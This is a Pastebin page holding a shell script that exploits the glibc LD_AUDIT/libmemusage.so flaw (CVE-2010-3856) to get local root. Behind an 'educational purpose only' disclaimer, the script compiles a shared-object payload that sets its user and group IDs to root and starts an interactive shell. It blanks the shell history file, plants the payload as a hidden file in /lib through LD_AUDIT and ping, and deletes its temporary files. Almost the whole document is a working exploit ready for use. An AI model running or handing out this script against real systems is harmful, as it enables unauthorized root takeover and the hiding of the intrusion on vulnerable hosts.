Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/sh
- #
- # [+] Linux GNU/libc <= 2.12.x LD_AUDIT libmemusage.so local root exploit
- #
- # Edited by Todor Donev
- # This is another exploit for CVE-2010-3856
- #
- # todor.donev@gmail.com
- # http://www.ethical-hacker.org/
- # https://www.facebook.com/ethicalhackerorg
- # http://pastebin.com/u/hackerscommunity
- #
- # Disclaimer:
- # This or previous program is for Educational
- # purpose ONLY. Do not use it without permission.
- # The usual disclaimer applies, especially the
- # fact that Todor Donev is not liable for any
- # damages caused by direct or indirect use of the
- # information or functionality provided by these
- # programs. The author or any Internet provider
- # bears NO responsibility for content or misuse
- # of these programs or any derivatives thereof.
- # By using these programs you accept the fact
- # that any damage (dataloss, system crash, system
- # compromise, etc.) caused by the use of these
- # programs is not Todor Donev's responsibility.
- #
- # Use at your own risk and educational purpose
- # ONLY!
- #
- # Another exploits:
- # http://www.0xdeadbeef.info/exploits/raptor_ldaudit
- # http://www.0xdeadbeef.info/exploits/raptor_ldaudit2
- # http://www.exploit-db.com/exploits/18105/
- # http://seclists.org/fulldisclosure/2010/Oct/257
- # http://seclists.org/bugtraq/2010/Oct/200
- #
- echo "[+] Setting umask to 0 so we have world writable files."
- umask 0
- echo "[+] Preparing binary payload.."
- cat > /tmp/payload.c <<_EOF
- void __attribute__((constructor)) init()
- {
- unlink("/lib/.ploit.so");
- setuid(0);
- setgid(0);
- setenv("HISTFILE", "/dev/null", 1);
- execl("/bin/sh", "/bin/sh", "-i", 0);
- }
- _EOF
- gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
- echo "[+] Writing root owned world readable file in /lib"
- LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="/lib/.ploit.so" ping 2>/dev/null
- echo "[+] Filling the lib file with lib contents."
- cat /tmp/exploit > /lib/.ploit.so
- rm /tmp/payload.c /tmp/exploit
- echo "[+] Executing payload.."
- LD_AUDIT=".ploit.so" ping
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement